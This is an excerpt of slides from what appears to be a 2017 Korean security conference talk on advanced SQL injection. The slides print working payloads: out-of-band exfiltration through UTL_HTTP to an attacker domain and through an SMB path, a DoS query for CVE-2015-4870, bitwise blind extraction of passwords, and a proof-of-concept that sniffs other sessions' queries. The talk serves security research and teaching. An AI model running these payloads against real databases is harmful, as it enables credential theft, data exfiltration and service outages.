![Page 69: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/69.jpg)
재귀적 return값을 통한 인증 우회
![Page 70: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/70.jpg)
Out Of Band SQLi
• 외부 서버로의 Packet 전송
• 내부 네트워크 파일 접근
• SQL 서버에 대한 DoS
![Page 71: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/71.jpg)
Out Of Band SQLi
• DNS Query
UTL_HTTP.REQUEST('http://'||(select…)||'.mydomain');
• Access SMB file
load_file('\\\\192.168.0.101\\aa');
![Page 72: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/72.jpg)
DBMS에 대한 DoS
• BENCHMARK()
• Heavy Query
• CVE-2015-4870
![Page 73: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/73.jpg)
CVE-2015-4870
select * from information_schema.tables
procedure analyse((select*from(select 1)x),1);
![Page 74: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/74.jpg)
Lord of SQL Injection
![Page 75: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/75.jpg)
Lord of SQL Injection
![Page 76: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/76.jpg)
Exploit more smartly
• Bitwise operation Blind SQL Injection
• UPDATE, INSERT Blind SQL Injection without modify data
• MITM SQL Injection
![Page 77: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/77.jpg)
Blind SQL Injection의 단점
• 느리다.
• 로그가 많이 남는다.
![Page 78: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/78.jpg)
Bitwise operation Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
![Page 79: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/79.jpg)
Bitwise operation Blind SQL Injection
substr(
lpad(
bin(
ascii(substr((select pw from users),1,1))
)
,8,0)
,1,1) = 1
![Page 80: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/80.jpg)
Bitwise operation Blind SQL Injection
substr(
lpad(
bin(
97
)
,8,0)
,1,1) = 1
![Page 81: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/81.jpg)
Bitwise operation Blind SQL Injection
substr(
lpad(
1100111
,8,0)
,1,1) = 1
![Page 82: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/82.jpg)
Bitwise operation Blind SQL Injection
substr(01100111,1,1) = 1
![Page 83: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/83.jpg)
Bitwise operation Blind SQL Injection
substr(lpad(bin(
ascii(substr((select pw from users),1,1))
),7,0),1,1)
![Page 84: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/84.jpg)
MITM SQL Injection
• Information_schema.processlist.info
![Page 85: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/85.jpg)
Sniff Query?
• 회원가입
insert into users values(“guest123”,md5(“mypass666”))
• 로그인
select...where id=‘guest123’ and pw=md5(‘mypass666’)
![Page 86: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/86.jpg)
But…
![Page 87: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/87.jpg)
• 직접 Sniffing하는게 너무 느리다면 DBMS에게 시키자!
• BENCHMARK(count,expr)
• @var_name = expr
![Page 88: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/88.jpg)
SELECT benchmark(9999999,
@query:=concat(
@query,(select info from information_schema.processlist)
)
)
![Page 89: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/89.jpg)
Issues
• 반복된 값을 조회할 때 Query의 결과값이 cache됨
select 권한만 가지고는 cache를 끌 수 없음
• 한번 조회된 query가 무수히 조회됨
![Page 90: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/90.jpg)
Proof of Concept
SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*MITM_SQLI_PWN*/))^(IF((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0))) UNION SELECT @query limit 3,1
![Page 91: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/91.jpg)
Proof of Concept
![Page 92: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/92.jpg)
![Page 93: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/93.jpg)
Tank You [email protected]